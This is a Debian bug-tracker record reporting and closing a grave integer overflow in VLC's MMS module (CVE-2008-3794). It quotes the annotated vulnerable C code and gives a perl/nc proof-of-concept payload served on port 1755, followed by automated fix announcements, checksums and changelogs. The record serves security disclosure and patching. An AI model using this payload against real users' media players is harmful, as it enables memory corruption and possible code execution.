Package: vlc; Maintainer for vlc is Debian Multimedia Maintainers <debian-multimedia@lists.debian.org>; Source for vlc is src:vlc (PTS, buildd, popcon).
Reported by: Nico Golde <nion@debian.org>
Date: Sun, 24 Aug 2008 00:21:01 UTC
Severity: grave
Tags: security
Found in versions vlc/0.8.6.i-1, vlc/0.8.6.h-1
Fixed in versions vlc/0.8.6.h-4, vlc/0.8.6.i-2, vlc/0.8.6.h-1+lenny1
Done: Steffen Joeris <white@debian.org>
Bug is archived. No further changes may be made.
View this report as an mbox folder, status mbox, maintainer mbox
Report forwarded to debian-bugs-dist@lists.debian.org, Debian multimedia packages maintainers <pkg-multimedia-maintainers@lists.alioth.debian.org>:
Bug#496265; Package vlc.
(full text, mbox, link).
Acknowledgement sent to Nico Golde <nion@debian.org>:
New Bug report received and forwarded. Copy sent to Debian multimedia packages maintainers <pkg-multimedia-maintainers@lists.alioth.debian.org>.
(full text, mbox, link).
Message #5 received at submit@bugs.debian.org (full text, mbox, reply):
[Message part 1 (text/plain, inline)]
Vulmon
Package: vlc
Version: 0.8.6.i-1
Severity: grave
Tags: security
Hi,
the following security issue was published for vlc
static int mms_ReceiveCommand( access_t *p_access )
{
access_sys_t *p_sys = p_access->p_sys;
for( ;; )
{
int i_used;
int i_status;
if( NetFillBuffer( p_access ) < 0 )
{
msg_Warn( p_access, "cannot fill buffer" );
return VLC_EGENERIC;
}
if( p_sys->i_buffer_tcp > 0 )
{
[1] i_status = mms_ParseCommand( p_access, p_sys->buffer_tcp,
p_sys->i_buffer_tcp, &i_used );
[2] if( i_used < MMS_BUFFER_SIZE )
{
[3] memmove( p_sys->buffer_tcp, p_sys->buffer_tcp + i_used,
MMS_BUFFER_SIZE - i_used ); //BUG! i_used overflow
(...)
[1] - function that sets i_used to negative value, see below
[2] - i_used is signed, so predicate is true
[3] - actual overflow, we have good control over what is written
static int mms_ParseCommand( access_t *p_access,
uint8_t *p_data,
int i_data,
int *pi_used )
(...)
i_length = GetDWLE( p_data + 8 ) + 16;
(...)
if( i_length > p_sys->i_cmd )
{
msg_Warn( p_access,
"truncated command (missing %d bytes)",
i_length - i_data );
p_sys->i_command = 0;
return -1;
}
[1] else if( i_length < p_sys->i_cmd )
{
p_sys->i_cmd = i_length;
[2] *pi_used = i_length;
}
(...)
[1] - predicate is true
[2] - sets i_used from mms_ReceiveCommand
- - Proof of concept -
on localhost:
perl -e 'print "aaaa\xce\xfa\x0b\xb0\xef\xff\xef\xff"; print "a"x100' > headshot
nc -l -v -p 1755 < headshot
open this url in VLC:
mmst://127.0.0.1/
I can confirm this issue exists.
Please see http://www.orange-bat.com/adv/2008/adv.08.24.txt for the original advisory.
I'll follow up on this bug report with a CVE id soon.
Kind regards
Nico
--
Nico Golde - http://www.ngolde.de - nion@jabber.ccc.de - GPG: 0x73647CFF
For security reasons, all text in this mail is double-rot13 encrypted.
[Message part 2 (application/pgp-signature, inline)]
Bug marked as found in version 0.8.6.h-1.
Request was from Nico Golde <nion@debian.org>
to control@bugs.debian.org.
(Sun, 24 Aug 2008 00:27:03 GMT) (full text, mbox, link).
Reply sent to Christophe Mutricy <xtophe@videolan.org>:
You have taken responsibility.
(full text, mbox, link).
Notification sent to Nico Golde <nion@debian.org>:
Bug acknowledged by developer.
(full text, mbox, link).
Message #12 received at 496265-close@bugs.debian.org (full text, mbox, reply):
Source: vlc Source-Version: 0.8.6.h-4 We believe that the bug you reported is fixed in the latest version of vlc, which is due to be installed in the Debian FTP archive: libvlc0-dev_0.8.6.h-4_i386.deb to pool/main/v/vlc/libvlc0-dev_0.8.6.h-4_i386.deb libvlc0_0.8.6.h-4_i386.deb to pool/main/v/vlc/libvlc0_0.8.6.h-4_i386.deb mozilla-plugin-vlc_0.8.6.h-4_i386.deb to pool/main/v/vlc/mozilla-plugin-vlc_0.8.6.h-4_i386.deb vlc-nox_0.8.6.h-4_i386.deb to pool/main/v/vlc/vlc-nox_0.8.6.h-4_i386.deb vlc-plugin-arts_0.8.6.h-4_i386.deb to pool/main/v/vlc/vlc-plugin-arts_0.8.6.h-4_i386.deb vlc-plugin-esd_0.8.6.h-4_i386.deb to pool/main/v/vlc/vlc-plugin-esd_0.8.6.h-4_i386.deb vlc-plugin-ggi_0.8.6.h-4_i386.deb to pool/main/v/vlc/vlc-plugin-ggi_0.8.6.h-4_i386.deb vlc-plugin-glide_0.8.6.h-4_i386.deb to pool/main/v/vlc/vlc-plugin-glide_0.8.6.h-4_i386.deb vlc-plugin-jack_0.8.6.h-4_i386.deb to pool/main/v/vlc/vlc-plugin-jack_0.8.6.h-4_i386.deb vlc-plugin-sdl_0.8.6.h-4_i386.deb to pool/main/v/vlc/vlc-plugin-sdl_0.8.6.h-4_i386.deb vlc-plugin-svgalib_0.8.6.h-4_i386.deb to pool/main/v/vlc/vlc-plugin-svgalib_0.8.6.h-4_i386.deb vlc_0.8.6.h-4.diff.gz to pool/main/v/vlc/vlc_0.8.6.h-4.diff.gz vlc_0.8.6.h-4.dsc to pool/main/v/vlc/vlc_0.8.6.h-4.dsc vlc_0.8.6.h-4_i386.deb to pool/main/v/vlc/vlc_0.8.6.h-4_i386.deb A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to 496265@bugs.debian.org, and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. Christophe Mutricy <xtophe@videolan.org> (supplier of updated vlc package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing ftpmaster@debian.org) -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Format: 1.8 Date: Mon, 25 Aug 2008 01:07:27 +0100 Source: vlc Binary: vlc vlc-nox libvlc0 libvlc0-dev vlc-plugin-esd vlc-plugin-sdl vlc-plugin-ggi vlc-plugin-glide vlc-plugin-arts mozilla-plugin-vlc vlc-plugin-svgalib vlc-plugin-jack Architecture: source i386 Version: 0.8.6.h-4 Distribution: unstable Urgency: high Maintainer: Debian multimedia packages maintainers <pkg-multimedia-maintainers@lists.alioth.debian.org> Changed-By: Christophe Mutricy <xtophe@videolan.org> Description: libvlc0 - multimedia player and streamer library libvlc0-dev - development files for VLC mozilla-plugin-vlc - multimedia plugin for web browsers based on VLC vlc - multimedia player and streamer vlc-nox - multimedia player and streamer (without X support) vlc-plugin-arts - aRts audio output plugin for VLC vlc-plugin-esd - Esound audio output plugin for VLC vlc-plugin-ggi - GGI video output plugin for VLC vlc-plugin-glide - Glide video output plugin for VLC vlc-plugin-jack - Jack audio plugins for VLC vlc-plugin-sdl - SDL video and audio output plugin for VLC vlc-plugin-svgalib - SVGAlib video output plugin for VLC Closes: 496265 Changes: vlc (0.8.6.h-4) unstable; urgency=high . * Security: Fix integer overflow in mms module (Closes: #496265)(407-mms-overflow.diff taken from upstream) Checksums-Sha1: 87c49e28b30660e3eda99eb9a22754f662a787b1 3078 vlc_0.8.6.h-4.dsc 6f0a359debd01f2ee15983ef4d78f168d58a033e 43520 vlc_0.8.6.h-4.diff.gz 0a7e0dd6df2d3510a65db65023586088a9b3dd1e 1084950 vlc_0.8.6.h-4_i386.deb 8688e42d538b46e37d38e45887d8719e11c87d6c 4977644 vlc-nox_0.8.6.h-4_i386.deb ead99b6a2baaadeb81236641e542c2aaab62325d 462036 libvlc0_0.8.6.h-4_i386.deb 439a814456fbf5096c9f97c6c66215558c068a26 478890 libvlc0-dev_0.8.6.h-4_i386.deb 6b666b8ab68c965216037656a7b30bdaa5e38cd6 5252 vlc-plugin-esd_0.8.6.h-4_i386.deb fe06b921729f38e051400ae35d5918f3105cef83 11108 vlc-plugin-sdl_0.8.6.h-4_i386.deb 5d19f2e57f20b1699325dd8cb69cd818dbf3c2f7 6126 vlc-plugin-ggi_0.8.6.h-4_i386.deb c5f59828cc9acfa10d21bb267ae837d6772a742b 4260 vlc-plugin-glide_0.8.6.h-4_i386.deb d9d5a1cfde7cf7d8a61b3c2069601f7a288000f7 4388 vlc-plugin-arts_0.8.6.h-4_i386.deb cc852b097347e61fd6cc166e173986e12ef50207 36986 mozilla-plugin-vlc_0.8.6.h-4_i386.deb 9c739cd67454ab4be9884f15a26b17ef163db510 4850 vlc-plugin-svgalib_0.8.6.h-4_i386.deb 549f98e975e2aebea09f44fffdc400c0567598e9 5154 vlc-plugin-jack_0.8.6.h-4_i386.deb Checksums-Sha256: 96c216dd41129a47009450be859264369eaa2f7b35530730993ea7e4e32c7ffd 3078 vlc_0.8.6.h-4.dsc 7857bb6d76fdc2719c616264322c9829f18e9264432c185a729abcdd4d7e1869 43520 vlc_0.8.6.h-4.diff.gz 85ce5e74a0e43852d1bdbe4bf5bcda4293724454031c7a11878450181b6b23ef 1084950 vlc_0.8.6.h-4_i386.deb 6bee2dc0c3d29b4ac4dd967d5dd73057d8c4b48e011f50a2e477febed3f6f219 4977644 vlc-nox_0.8.6.h-4_i386.deb b7c22ead5a4624af106cd1759b4adbd2ae7fbbdac2280d9edd422832b7dbc0b7 462036 libvlc0_0.8.6.h-4_i386.deb 8e4b98bc6fcc9c1af10a4b82612a4842f5514efe8e40604c9e373bd91816e1e3 478890 libvlc0-dev_0.8.6.h-4_i386.deb eb67515cb7a3a39d21b8b2b5cb88d3e09f775eb6e4425398029a7556e296deba 5252 vlc-plugin-esd_0.8.6.h-4_i386.deb 53cd1b288e6cc117884c5152db21011b9d6657dfb50612ece48cbdcb876505ea 11108 vlc-plugin-sdl_0.8.6.h-4_i386.deb 16b734da7eec76b86684dc61d0fec44feaa62a782ace70d6f7a2fd0aff760e5f 6126 vlc-plugin-ggi_0.8.6.h-4_i386.deb 223ad03e12fb064ec20c89ca862358ac13071cedc1ba45bbfdfdef8b0f253340 4260 vlc-plugin-glide_0.8.6.h-4_i386.deb 12eabf31634b612269d0b528b9ef0511f1a9df1e92861068463b7d6d0944284b 4388 vlc-plugin-arts_0.8.6.h-4_i386.deb ff8d67da7e3196b5e5e2087e6a48d45b4745fda6b8f7deba7f1bd28518cc261e 36986 mozilla-plugin-vlc_0.8.6.h-4_i386.deb d33445fb15902f23b93218962b9cc30f104c9c25d1e4cf99d625de6e0b59e333 4850 vlc-plugin-svgalib_0.8.6.h-4_i386.deb f79f055bf093e29a9d8de6882f1482be1bd53b4b4cc9cff9fe8b7acb7c869e8c 5154 vlc-plugin-jack_0.8.6.h-4_i386.deb Files: 7ec744af90ad0b5767e10cfd5e809195 3078 graphics optional vlc_0.8.6.h-4.dsc b600267ce45934434e363fc7706acecc 43520 graphics optional vlc_0.8.6.h-4.diff.gz 72446cf1099c82e3f2f837c139345f61 1084950 graphics optional vlc_0.8.6.h-4_i386.deb cbedfff946d9ddf9d7f2bbe4009a1f14 4977644 net optional vlc-nox_0.8.6.h-4_i386.deb 8763bf84ae4f05c50e5b8433a1388e68 462036 libs optional libvlc0_0.8.6.h-4_i386.deb eb8e3b32c8632e5644d31a4b21cb7b66 478890 libdevel optional libvlc0-dev_0.8.6.h-4_i386.deb 5523f63affba2463fdc44c9b6f566ee7 5252 graphics optional vlc-plugin-esd_0.8.6.h-4_i386.deb 5a42bf695d6929cb1931b97df20d9585 11108 graphics optional vlc-plugin-sdl_0.8.6.h-4_i386.deb 6aa646b57c84cee041a48bd16aa7adb7 6126 graphics optional vlc-plugin-ggi_0.8.6.h-4_i386.deb 58b721b6199edbd9f6d77d32ae689561 4260 graphics optional vlc-plugin-glide_0.8.6.h-4_i386.deb c2e312f012dea07a6cc901a0cfffd2bc 4388 graphics optional vlc-plugin-arts_0.8.6.h-4_i386.deb 57c99fe6433509d484b1d9511f9d82ae 36986 graphics optional mozilla-plugin-vlc_0.8.6.h-4_i386.deb a1fe89726918e5ed7d7a58b47d599609 4850 graphics optional vlc-plugin-svgalib_0.8.6.h-4_i386.deb ae389a014d6da56487d691695077a151 5154 graphics optional vlc-plugin-jack_0.8.6.h-4_i386.deb -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) Comment: Debian Powered! iEYEARECAAYFAkiynk0ACgkQmAg1RJRTSKSm7ACeLYWR5gz5wxY7YF0Ql5/iK3SD YywAnjMgNxC1/cPzEadaidIevDQoYv58 =NaMd -----END PGP SIGNATURE-----
Reply sent to Sam Hocevar (Debian packages) <sam+deb@zoy.org>:
You have taken responsibility.
(full text, mbox, link).
Notification sent to Nico Golde <nion@debian.org>:
Bug acknowledged by developer.
(full text, mbox, link).
Message #17 received at 496265-close@bugs.debian.org (full text, mbox, reply):
Source: vlc Source-Version: 0.8.6.i-2 We believe that the bug you reported is fixed in the latest version of vlc, which is due to be installed in the Debian FTP archive: libvlc0-dev_0.8.6.i-2_amd64.deb to pool/main/v/vlc/libvlc0-dev_0.8.6.i-2_amd64.deb libvlc0_0.8.6.i-2_amd64.deb to pool/main/v/vlc/libvlc0_0.8.6.i-2_amd64.deb mozilla-plugin-vlc_0.8.6.i-2_amd64.deb to pool/main/v/vlc/mozilla-plugin-vlc_0.8.6.i-2_amd64.deb vlc-nox_0.8.6.i-2_amd64.deb to pool/main/v/vlc/vlc-nox_0.8.6.i-2_amd64.deb vlc-plugin-arts_0.8.6.i-2_amd64.deb to pool/main/v/vlc/vlc-plugin-arts_0.8.6.i-2_amd64.deb vlc-plugin-esd_0.8.6.i-2_amd64.deb to pool/main/v/vlc/vlc-plugin-esd_0.8.6.i-2_amd64.deb vlc-plugin-ggi_0.8.6.i-2_amd64.deb to pool/main/v/vlc/vlc-plugin-ggi_0.8.6.i-2_amd64.deb vlc-plugin-jack_0.8.6.i-2_amd64.deb to pool/main/v/vlc/vlc-plugin-jack_0.8.6.i-2_amd64.deb vlc-plugin-sdl_0.8.6.i-2_amd64.deb to pool/main/v/vlc/vlc-plugin-sdl_0.8.6.i-2_amd64.deb vlc-plugin-svgalib_0.8.6.i-2_amd64.deb to pool/main/v/vlc/vlc-plugin-svgalib_0.8.6.i-2_amd64.deb vlc_0.8.6.i-2.diff.gz to pool/main/v/vlc/vlc_0.8.6.i-2.diff.gz vlc_0.8.6.i-2.dsc to pool/main/v/vlc/vlc_0.8.6.i-2.dsc vlc_0.8.6.i-2_amd64.deb to pool/main/v/vlc/vlc_0.8.6.i-2_amd64.deb A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to 496265@bugs.debian.org, and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. Sam Hocevar (Debian packages) <sam+deb@zoy.org> (supplier of updated vlc package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing ftpmaster@debian.org) -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Format: 1.8 Date: Tue, 26 Aug 2008 23:25:13 +0000 Source: vlc Binary: vlc vlc-nox libvlc0 libvlc0-dev vlc-plugin-esd vlc-plugin-sdl vlc-plugin-ggi vlc-plugin-glide vlc-plugin-arts mozilla-plugin-vlc vlc-plugin-svgalib vlc-plugin-jack Architecture: source amd64 Version: 0.8.6.i-2 Distribution: experimental Urgency: high Maintainer: Debian multimedia packages maintainers <pkg-multimedia-maintainers@lists.alioth.debian.org> Changed-By: Sam Hocevar (Debian packages) <sam+deb@zoy.org> Description: libvlc0 - multimedia player and streamer library libvlc0-dev - development files for VLC mozilla-plugin-vlc - multimedia plugin for web browsers based on VLC vlc - multimedia player and streamer vlc-nox - multimedia player and streamer (without X support) vlc-plugin-arts - aRts audio output plugin for VLC vlc-plugin-esd - Esound audio output plugin for VLC vlc-plugin-ggi - GGI video output plugin for VLC vlc-plugin-glide - Glide video output plugin for VLC vlc-plugin-jack - Jack audio plugins for VLC vlc-plugin-sdl - SDL video and audio output plugin for VLC vlc-plugin-svgalib - SVGAlib video output plugin for VLC Closes: 496265 Changes: vlc (0.8.6.i-2) experimental; urgency=high . [ Loic Minier ] * Fix changelog entries for 0.8.6.h-2 and 0.8.6.h-3. * Bump up Standards-Version to 3.8.0. . [ Christophe Mutricy ] * Security: Fix integer overflow in mms module (CVE-2008-3794) (Closes: #496265)(407-mms-overflow.diff taken from upstream) . [ Sam Hocevar ] * debian/patches/300_manpage_syntax.diff: fix vlc-config.1 syntax. Checksums-Sha1: 6ce41230b85bade483df7ee3b7e5b9a0c3fb22f2 3053 vlc_0.8.6.i-2.dsc fb46ba02378bb76212e544a7b9ff8016743f4b24 41590 vlc_0.8.6.i-2.diff.gz 15c152a6012f45e0bd328186d5bd99df00ba4d37 1102526 vlc_0.8.6.i-2_amd64.deb e7fc90fb76b92079bab8fa6cda8616c596d9fcbb 4962976 vlc-nox_0.8.6.i-2_amd64.deb 8f7bf99438823c72eef11e8d1bf8e4b466a1c465 464238 libvlc0_0.8.6.i-2_amd64.deb e64fbde1b3f4f5a06970f00afcee6f4224f5254b 501438 libvlc0-dev_0.8.6.i-2_amd64.deb 7a3b1e996edb12b1e2431867da729f368026dd6c 4526 vlc-plugin-esd_0.8.6.i-2_amd64.deb e250288acb3bb744672d79eb30b54f600e204da7 11680 vlc-plugin-sdl_0.8.6.i-2_amd64.deb 252a78ad8775731b98c0229da476fcf6b53c62db 6178 vlc-plugin-ggi_0.8.6.i-2_amd64.deb 379ed8f013cf4494a3cb51faa2096866857aa92a 4172 vlc-plugin-arts_0.8.6.i-2_amd64.deb 27cba01a90a8f31a0ccde3a4ca651f40aae398cc 37362 mozilla-plugin-vlc_0.8.6.i-2_amd64.deb 552b5b988c4fecef16f7751ec8f702786e0f3857 4758 vlc-plugin-svgalib_0.8.6.i-2_amd64.deb e862fd9b83940854fb644cabe575435a077c4bac 4932 vlc-plugin-jack_0.8.6.i-2_amd64.deb Checksums-Sha256: 581cdd58a6ee198bf9019950d5c3baa971e0f3dc17fe045ac001958022ec3b23 3053 vlc_0.8.6.i-2.dsc 725a91468fd18b04af6f974c54aff095907bf34278bd9e0e52cd2317601526d7 41590 vlc_0.8.6.i-2.diff.gz 55cfdfe0edcc4a88c3708ab44ac30f6cedf70a60769cf67006a7591e8947f891 1102526 vlc_0.8.6.i-2_amd64.deb 9dba971b25565ce4e24b37c720a595230d3101485b0dbdef7b3cb943df640879 4962976 vlc-nox_0.8.6.i-2_amd64.deb 2f877723c444dd530705be40acd7f53883ac4eb2e299bc6bd6ac19e18ea1102a 464238 libvlc0_0.8.6.i-2_amd64.deb eacfecf0a7ea8541f58f575a1f8e572e4a582f7ea3b15486854908717a011e24 501438 libvlc0-dev_0.8.6.i-2_amd64.deb 263cc9aad3a6ce8ec2b163c711ec8295ae40e19a11dc54be4b1b29d11ccb8c0f 4526 vlc-plugin-esd_0.8.6.i-2_amd64.deb 70de28056245a4abed8c16b2002e433c4f0442233e60d69e8430eea2f8ba0dff 11680 vlc-plugin-sdl_0.8.6.i-2_amd64.deb 010bdd14c36b99ade3226eece0ba6b5ebdc3c0e31f9bb89373924f1d8b6cb299 6178 vlc-plugin-ggi_0.8.6.i-2_amd64.deb ca1846d9697c92c888f94df023e60f51eb8daabb4c5ed88e2505382be4e9f13c 4172 vlc-plugin-arts_0.8.6.i-2_amd64.deb aa3c8b70078adbcbb40dbb67a92f9f4310a69ee04044e8f8bdf28ece4fc3a44b 37362 mozilla-plugin-vlc_0.8.6.i-2_amd64.deb a7425191b06c2def81d3c0a9e2a4923369b964cd0fabdd2f163fbf47ec1b0c22 4758 vlc-plugin-svgalib_0.8.6.i-2_amd64.deb 8da779e07e39268b0c2e9993bd0fedfe9fe71d5acb03049b71cbd8171da3cab8 4932 vlc-plugin-jack_0.8.6.i-2_amd64.deb Files: dd7c02d8cd97e974a0f44c5349089bd5 3053 graphics optional vlc_0.8.6.i-2.dsc 4ea59a106261082284cf3c96e0280bcb 41590 graphics optional vlc_0.8.6.i-2.diff.gz 74c76d66a462d8ceaf91cdebb922579b 1102526 graphics optional vlc_0.8.6.i-2_amd64.deb 3539915e8c0f8646304393521578da52 4962976 net optional vlc-nox_0.8.6.i-2_amd64.deb 71569170cfa7c9e001d39953f128ffd4 464238 libs optional libvlc0_0.8.6.i-2_amd64.deb 52ae490cb3a7340da9c5e21f76dc06bd 501438 libdevel optional libvlc0-dev_0.8.6.i-2_amd64.deb f593434b22807e62ffe9a32c8385ca46 4526 graphics optional vlc-plugin-esd_0.8.6.i-2_amd64.deb a138f20aa47e542809507fade0e96fe2 11680 graphics optional vlc-plugin-sdl_0.8.6.i-2_amd64.deb e3623188392f573e25da31edb974dfc9 6178 graphics optional vlc-plugin-ggi_0.8.6.i-2_amd64.deb 58adfd3cae2f7d57addd5bc7f00b6341 4172 graphics optional vlc-plugin-arts_0.8.6.i-2_amd64.deb a5dec890b8d86bca13a21df588e0e498 37362 graphics optional mozilla-plugin-vlc_0.8.6.i-2_amd64.deb 6b1f3cbf95b2d81057cee9e16113d88f 4758 graphics optional vlc-plugin-svgalib_0.8.6.i-2_amd64.deb aef2c31effd382c35a79b5c71959787c 4932 graphics optional vlc-plugin-jack_0.8.6.i-2_amd64.deb -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iEUEARECAAYFAki0m18ACgkQfPP1rylJn2GCNwCXZvEAHX/+GcnmHdxFhm0Vh403 /wCglAPJpSK6Ce84z8zJKFX3onttt4g= =WsNO -----END PGP SIGNATURE-----
Reply sent to Steffen Joeris <white@debian.org>:
You have taken responsibility.
(full text, mbox, link).
Notification sent to Nico Golde <nion@debian.org>:
Bug acknowledged by developer.
(full text, mbox, link).
Message #22 received at 496265-close@bugs.debian.org (full text, mbox, reply):
Source: vlc Source-Version: 0.8.6.h-1+lenny1 We believe that the bug you reported is fixed in the latest version of vlc, which is due to be installed in the Debian FTP archive: libvlc0-dev_0.8.6.h-1+lenny1_i386.deb to pool/main/v/vlc/libvlc0-dev_0.8.6.h-1+lenny1_i386.deb libvlc0_0.8.6.h-1+lenny1_i386.deb to pool/main/v/vlc/libvlc0_0.8.6.h-1+lenny1_i386.deb mozilla-plugin-vlc_0.8.6.h-1+lenny1_i386.deb to pool/main/v/vlc/mozilla-plugin-vlc_0.8.6.h-1+lenny1_i386.deb vlc-nox_0.8.6.h-1+lenny1_i386.deb to pool/main/v/vlc/vlc-nox_0.8.6.h-1+lenny1_i386.deb vlc-plugin-arts_0.8.6.h-1+lenny1_i386.deb to pool/main/v/vlc/vlc-plugin-arts_0.8.6.h-1+lenny1_i386.deb vlc-plugin-esd_0.8.6.h-1+lenny1_i386.deb to pool/main/v/vlc/vlc-plugin-esd_0.8.6.h-1+lenny1_i386.deb vlc-plugin-ggi_0.8.6.h-1+lenny1_i386.deb to pool/main/v/vlc/vlc-plugin-ggi_0.8.6.h-1+lenny1_i386.deb vlc-plugin-glide_0.8.6.h-1+lenny1_i386.deb to pool/main/v/vlc/vlc-plugin-glide_0.8.6.h-1+lenny1_i386.deb vlc-plugin-jack_0.8.6.h-1+lenny1_i386.deb to pool/main/v/vlc/vlc-plugin-jack_0.8.6.h-1+lenny1_i386.deb vlc-plugin-sdl_0.8.6.h-1+lenny1_i386.deb to pool/main/v/vlc/vlc-plugin-sdl_0.8.6.h-1+lenny1_i386.deb vlc-plugin-svgalib_0.8.6.h-1+lenny1_i386.deb to pool/main/v/vlc/vlc-plugin-svgalib_0.8.6.h-1+lenny1_i386.deb vlc_0.8.6.h-1+lenny1.diff.gz to pool/main/v/vlc/vlc_0.8.6.h-1+lenny1.diff.gz vlc_0.8.6.h-1+lenny1.dsc to pool/main/v/vlc/vlc_0.8.6.h-1+lenny1.dsc vlc_0.8.6.h-1+lenny1_i386.deb to pool/main/v/vlc/vlc_0.8.6.h-1+lenny1_i386.deb A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to 496265@bugs.debian.org, and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. Steffen Joeris <white@debian.org> (supplier of updated vlc package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing ftpmaster@debian.org) -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Format: 1.8 Date: Sun, 14 Sep 2008 11:18:40 +0000 Source: vlc Binary: vlc vlc-nox libvlc0 libvlc0-dev vlc-plugin-esd vlc-plugin-sdl vlc-plugin-ggi vlc-plugin-glide vlc-plugin-arts mozilla-plugin-vlc vlc-plugin-svgalib vlc-plugin-jack Architecture: source i386 Version: 0.8.6.h-1+lenny1 Distribution: testing-security Urgency: high Maintainer: Debian multimedia packages maintainers <pkg-multimedia-maintainers@lists.alioth.debian.org> Changed-By: Steffen Joeris <white@debian.org> Description: libvlc0 - multimedia player and streamer library libvlc0-dev - development files for VLC mozilla-plugin-vlc - multimedia plugin for web browsers based on VLC vlc - multimedia player and streamer vlc-nox - multimedia player and streamer (without X support) vlc-plugin-arts - aRts audio output plugin for VLC vlc-plugin-esd - Esound audio output plugin for VLC vlc-plugin-ggi - GGI video output plugin for VLC vlc-plugin-glide - Glide video output plugin for VLC vlc-plugin-jack - Jack audio plugins for VLC vlc-plugin-sdl - SDL video and audio output plugin for VLC vlc-plugin-svgalib - SVGAlib video output plugin for VLC Closes: 496265 Changes: vlc (0.8.6.h-1+lenny1) testing-security; urgency=high . * Non-maintainer upload by the security team * Fix integer overflow in the mms module (Closes: #496265) Fixes: CVE-2008-3794 * Fix integer overflow in the TTA module Fixes: CVE-2008-3732 * Change build-depends to libdc1394-22-dev to let it build on lenny Checksums-Sha1: f16fcac0aaa7f7193cf4b0f77166c5c474fbd34e 3081 vlc_0.8.6.h-1+lenny1.dsc 829b2599a9188254d1c109be377b4a9c18e14482 16977154 vlc_0.8.6.h.orig.tar.gz 80008801b7273fa3508b43dd1142bdb8904f8cec 42849 vlc_0.8.6.h-1+lenny1.diff.gz 3de7424b93cef51948bfc66afcb4d37ec0c4e4d0 1083962 vlc_0.8.6.h-1+lenny1_i386.deb f1db92d4a7cf3297524ddd5b59a340c34d7cfa4a 4994140 vlc-nox_0.8.6.h-1+lenny1_i386.deb 1945ccb0c061149f19916f4c3fec7b74e0112eab 461398 libvlc0_0.8.6.h-1+lenny1_i386.deb d51b20e764c0bb8ec99cf4ed4c7b34af4813d99b 479384 libvlc0-dev_0.8.6.h-1+lenny1_i386.deb 4309bca18390d6e8d95deda5178b15fc41d35ba0 5264 vlc-plugin-esd_0.8.6.h-1+lenny1_i386.deb 65ebb0c4944608ee6be0c071615883a10ee37c82 11112 vlc-plugin-sdl_0.8.6.h-1+lenny1_i386.deb 213296b6d44f7f9a9735a662aaad1b59fbc9b7b5 6132 vlc-plugin-ggi_0.8.6.h-1+lenny1_i386.deb bf37c92525f90e4286b25cd6ab97ca0ce056edc6 4268 vlc-plugin-glide_0.8.6.h-1+lenny1_i386.deb ab93e67c81d08421b91731aa7065073bcf8c3af1 4394 vlc-plugin-arts_0.8.6.h-1+lenny1_i386.deb 46c21e38b43be33ba930e0d29fa16706efa67ef5 36996 mozilla-plugin-vlc_0.8.6.h-1+lenny1_i386.deb e0b47d914055407b372569f070d27a9ff0f74845 4866 vlc-plugin-svgalib_0.8.6.h-1+lenny1_i386.deb bf729a79bec7807f08ef58988f7561da69833129 5164 vlc-plugin-jack_0.8.6.h-1+lenny1_i386.deb Checksums-Sha256: 47bbbe7b904641255b43e84216f787444c4c34aca5d3b26f08151bccad17c0b6 3081 vlc_0.8.6.h-1+lenny1.dsc 92a998f2ca53b77610c608436b2e8d991442742f25793c136cb4ee095eec1eff 16977154 vlc_0.8.6.h.orig.tar.gz 2261fe7380c03956f462f43dfd0844b35204912d1a1739a137dabfbfcefaf953 42849 vlc_0.8.6.h-1+lenny1.diff.gz 35bd55d0bc820069f1187d7843a3a61383f7845e741acb1b9e00eaadc7031e47 1083962 vlc_0.8.6.h-1+lenny1_i386.deb 393a44686549dc8272943b6b6fd496bf07998b0d4185f82d4d3eb5c946be6b1e 4994140 vlc-nox_0.8.6.h-1+lenny1_i386.deb 217b19a6efaf83d56151a2c7fab639d63046bd40764cc4c673ac1b5317e3819e 461398 libvlc0_0.8.6.h-1+lenny1_i386.deb 9910352fb40ec4c4ccaaf4118f4b921c0342eb8ab3facc61540a78b78029d032 479384 libvlc0-dev_0.8.6.h-1+lenny1_i386.deb 700bea215bfd71cc7e0d167805b0144dfe6021ac6dbb4d30508308f19f9c95cd 5264 vlc-plugin-esd_0.8.6.h-1+lenny1_i386.deb 33bdceb86b8ab6ace94a50852189e7f494e04a92dcad51e435f0bf74ec6aed42 11112 vlc-plugin-sdl_0.8.6.h-1+lenny1_i386.deb 88ba151308739abdb90986c237f7d65455ec421ee8d0eff1a93ca40eeff174a1 6132 vlc-plugin-ggi_0.8.6.h-1+lenny1_i386.deb 65ac9f11003fb228c7bb0fdf0a0f5c5be30cacd1f91d9a48f2fb31bb3d76c675 4268 vlc-plugin-glide_0.8.6.h-1+lenny1_i386.deb af88d597e88aba46f8e979d835c691208fc438b3865f70a7d26a9b0ede8ceb92 4394 vlc-plugin-arts_0.8.6.h-1+lenny1_i386.deb da841136a57ad24f80bdab96d8f66b92e88d7bd0f8e6c7a0aaca5719ce08c891 36996 mozilla-plugin-vlc_0.8.6.h-1+lenny1_i386.deb 854cb7277eec5860ffc050e1dc7edae6f430509c3d859d54017a1df3f2923ac7 4866 vlc-plugin-svgalib_0.8.6.h-1+lenny1_i386.deb 62604f46cd19cf7b66a663ae51771290883e433c07c0c006ab1e13ee6db8d33f 5164 vlc-plugin-jack_0.8.6.h-1+lenny1_i386.deb Files: d5a3621ca07894bf4f5ef2cd5e8cc3f1 3081 graphics optional vlc_0.8.6.h-1+lenny1.dsc 9b3e15802b482cb12e79d2eb8cc4ea98 16977154 graphics optional vlc_0.8.6.h.orig.tar.gz bfa7d0e2382c30f8006f0e4360da7281 42849 graphics optional vlc_0.8.6.h-1+lenny1.diff.gz b667a1cb71f8c9b16a49d3956090fb94 1083962 graphics optional vlc_0.8.6.h-1+lenny1_i386.deb 